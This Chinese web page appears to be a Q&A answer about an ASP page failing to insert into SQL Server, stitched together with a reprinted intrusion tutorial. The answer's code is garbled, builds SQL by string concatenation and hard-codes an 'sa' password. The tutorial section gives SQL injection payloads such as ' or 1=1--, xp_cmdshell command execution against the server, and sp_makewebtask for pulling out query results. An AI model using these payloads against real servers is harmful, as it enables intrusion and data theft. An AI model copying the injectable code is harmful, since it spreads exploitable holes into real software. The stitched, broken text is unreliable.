asp不能写入SQL数据库

asp不能写入SQL数据库,第1张

registerSql="insert into cx values('"&sname&"','"&sdepartment&"','"&mendian&"','"&riqi&"','"&sg&"')"

语句错误,改为

registerSql="insert into cx(sname,sdepartment,mendian,riqi,sg) values('"&sname&"','"&sdepartment&"','"&mendian&"','"&riqi&"','"&sg&"')"

添加了字段名,你看看你表中的字段是否对应。不对应就改对应。

养成好习惯,区分吧。

上面的代码换成:

<%

dim

Dim

ConnStr,SqlDatabaseName,SqlPassword,SqlUsername,SqlLocalName,conn

dim

db

SqlDatabaseName

=

"pcik_user"

'Account

数据库

SqlUsername

=

"sa"

'SQL帐号

SqlPassword

=

"8812345"

'SQL密码

SqlLocalName

=

"(local)"

'连接主机

'response.buffer=true

'启用缓冲处理

on

error

resume

next

set

conn=server.createobject("ADODB.connection")

conn.Open"Provider=sqloledbuser

id="SqlUsername&"password="&SqlPassword

&"initial

catalog="&SqlDatabaseName&"data

source="&SqlLocalName&""

if

err

then

err.clear

Response.Write"<br><br><br><center><font

style=color:redfont-size:9pt><b>数据库连接出错,请检查

连接字串</b></font></center>"

Response.End

else

conn.open

connstr

Response.redirect

"../Info.asp?msgid=0&MsgBtn=1"

end

if

sub

CloseConn()

conn.close

set

conn=nothing

end

sub

%>

黑客SQL服务器入侵实战演习(二)

3.1为什么使用的是' or 1=1--呢?

让我们来看看其他例子中使用'or 1=1--的重要性吧。有别于正常的登陆方式,使用这样的登陆方式可能得到正常登陆中不能得到的某些特殊信息。用一个链接中得到的ASP页来打比方:

http://duck/index.asp?category=food

在上面这条URL中,'category'是一个变量名,而'food'是赋予该变量的值。为了做到这些(链接成功),

这个ASP必须包含以下相关的代码(下面也是我们为了演示这个实验所写的代码):

v_cat = request("category)

&v_cat &"'

set rs=conn.execute(sqlstr)

正如我们所看到的,变量值将会预先处理然后赋值于'v_cat',也就是说该SQL语句将会变为:

SELECT * FROM product WHERE PCategory='food'

这个请求将会返回通过WHERE条件比较后得到的结果,在这个例子中也就是'food'了。现在设想一下如果

我们把该URL改成这样的话:

http://duck/index.asp?category=food' or 1=1--

现在我们的变量v_cat的值就等同于"food' or 1=1--了,现在如果我们要重新代入那条SQL请求的话,

那条SQL请求将会是:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

现在这个请求将会从product表中选取每一条信息而并不会去理会PCategory是否等于'food'。至于结尾部分的那两条'--'(破折号)则用于‘告诉’MS SQL SERVER忽略结尾最后的那个'(单引号)。有的时候也可以使用'#'(井号)来代替'--'(双破折号)在这里的用法。

无论如何,如果对方不是一台SQL服务器(这里指的是MS SQL SERVER),或者你不能使用简单的方法去忽略最后的那个单引号的话,你可以尝试:

' or 'a'='a

这样的话整个SQL请求将会变为:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

它也会返回相同的结果。

根据实际情况,SQL注入请求是可以有多种动态变化的可能性的:

' or 1=1--

"a

') or ('a'='a

4.0如何在SQL注入请求中加入即时执行命令

能够进行SQL注入的服务器通常都是一些疏于做系统性配置检查的机器,此时我们可以尝试使用SQL的命令执行请求。默认的MS SQL服务器是运行在SYSTEM用户级别下的,这等同于系统管理员的执行与访问权限。我们可以使用MS SQL SERVER的扩展储存过程(如master..xp_cmdshell等)来执行远程系统的某些命令:

'exec master..xp_cmdshell 'ping 10.10.1.2'--

若失败可以尝试一下使用(双引号)代替'(单引号)。

上面例子中的第二个冒号代表一句SQL请求的结束(也代表了它后面紧跟着一条新SQL命令)。若要检验上面这条PING命令是否成功,你可以在10.10.1.2这台机器上监听ICMP请求包,并确认它是否来自那台SQL服务器就可以了:

#tcpdump icmp

如果你不能从那台SQL服务器中得到PING请求的话,并在SQL请求的返回值中得到错误信息的话,有可能是因为该SQL服务器的管理员限制了WEB用户访问这些储存过程了。

5.0如何可以获取到我发的SQL请求的相关返回信息呢?

我们可以使用sp_makewebtask处理过程的相关请求写入URL:

"SELECT * FROM INFORMATION

_SCHEMA.TABLES

但先决条件是目标主机的文件夹“share”属性必须设置为“Everyone”。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/bake/11793838.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-18
下一篇 2023-05-18

发表评论

登录后才能评论

评论列表(0条)

保存